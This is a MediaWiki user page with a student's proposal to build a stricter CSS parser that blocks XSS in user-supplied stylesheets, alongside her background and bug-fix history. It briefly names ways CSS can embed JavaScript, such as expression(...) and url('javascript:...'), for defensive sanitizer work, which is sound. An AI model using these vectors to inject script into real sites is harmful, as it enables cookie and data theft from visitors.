User:Sakshi b/Proposal

Personal Details

 * Name: Sakshi Bansal
 * Email: sakshi.april5@gmail.com
 * Other contact methods: gtalk, IRC, Skype
 * Location: Kerala, India
 * Timezone: GMT+5.30

XSS attack in CSS
Cross-site Scripting or XSS attacks is one of the most common attacks found in dynamic web page. A dynamic web page is that whose output depends on the parameters provided by the client or the user. These parameters can be provided by means of form fields etc. XSS is performed by embedding malicious code in this dynamic web page, hence when a client (the victim) access the page he will actually execute the malicious script in his machine. The use of XSS can be to gather private information, steal cookies, delete records from database etc.

As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this goal:
 * By using the expression(...) directive, which gives the ability to evaluate arbitrary JavaScript statements and use their value as a CSS parameter.
 * By using the url('javascript:...') directive on properties that support it.
 * By invoking browser-specific features.

Current Scenario
CSS extension provides a mechanism to provide CSS to individual code. This also means that there is a high probability for injecting malicious code. The CSS extension also provides checks against XSS. However the current implementation provides very crude checks. Hence a lot of valid CSS code is rejected. The aim of this project is to implement a better CSS parser which will reject all malicious code and accept all the legal code. Hence the new CSS parser should ensure security and accuracy.

About you
I am a fourth year student currently pursuing my Bachelors in Computer Science Engineering from Amrita Vishwa Vidyapeetham, India. I would be graduating in May 2014. I am among the Top 2% in my class.

My area of interest mainly lies in web development and web security. I am proficient in website development languages like HTML, CSS, JavaScript, PHP, MySQL. I have conducted sessions on JavaScript and PHP for FOSS club members in my University. I am a part of the University team - bi0s. My team participates in various National and International level Capture The Flag(CTF) Ethical Hacking Contests. We have been consistently performing well and had secured 1st position in India and 72nd position out of more than 639 teams that had participated for CSAW CTF 2012. In my team I am in-charge of the web-services. Participating in these ethical hacking contests has improved my learning curve.

I have fixed bugs in Thunderbird in a short time span, which shows that I am a fast learner. I greatly improved my communication skills after constantly being on the IRC and asking questions on the project idea and various bugs.

Work/Internship Experience
I have implemented Access Control List (ACL) library using Java servlets. As a personal project and out of interest for web development I have developed a project On-line Banking. Here I implemented both the front-end using HTML, JavaScript, PHP and a back-end using MySQL for the application. I have also developed a small application ‘Music Academy Registration’. Here I implemented front-end using Java and back-end using PostgreSQL.

Participation
I am a punctual person and always complete my work on time. I would follow the time line that I have developed, so that I am always completing my work on time. I would also report the completion of my work to my mentor and also keep an update about it on my user page so that the developers would know about the progress of the project. For any help required I would try to search, ask at IRC and discuss with my mentor.

Past open source experience
Mediawiki: 

Currently working on the following bugs:

Bug 50808 - There is no need for a "details" link if the user is already in the "details" page

Bug 55980 - In Special:Watchlist, "Show/Hide logged-in users" should be "Show/Hide registered users"

I have fixed the following bugs in Thunderbird: 

Bug 581470 - Ctrl+P and Ctrl+W not working from Print Preview window

Bug 708550 - Cannot copy version string from "About Thunderbird" dialogue window

Bug 507103 - Composition's "Save" button remembers last "Save as" choice (draft, template, or file), but no indication of current choice in drop down menu (menu items should be type="radio")

Bug 325777 - "Search messages" window has mislabeled button - "File" should be "Move"

Bug 465351 - Wrong message and reason reported with untrusted CA roots when signing email

Reported bugs:

Bug 866498 - Radio group for Main Menu Bar->View->Feed Message Body As-> and Radio group for App Menu-> View->Feed message Body As-> are not in sync with each other.

Why FOSS
According to the Principles of Security, Security through Obscurity is not a very good technique since there can be lot of bugs and security flaws. However if the source code is available public-ally (FOSS), a large number of people can analyze the code and find bugs, security flaws. This directly improves the quality of the products. Also since people can download the source code, they can also modify the code to suit their needs. Again this implies that the products developed under FOSS are more user-friendly and user-centric. Open Source Contribution gives an opportunity to users to help develop their favorite products. The contribution ranges from simple bug fixes to adding new modules. This also means that the better versions of the products are available faster than otherwise.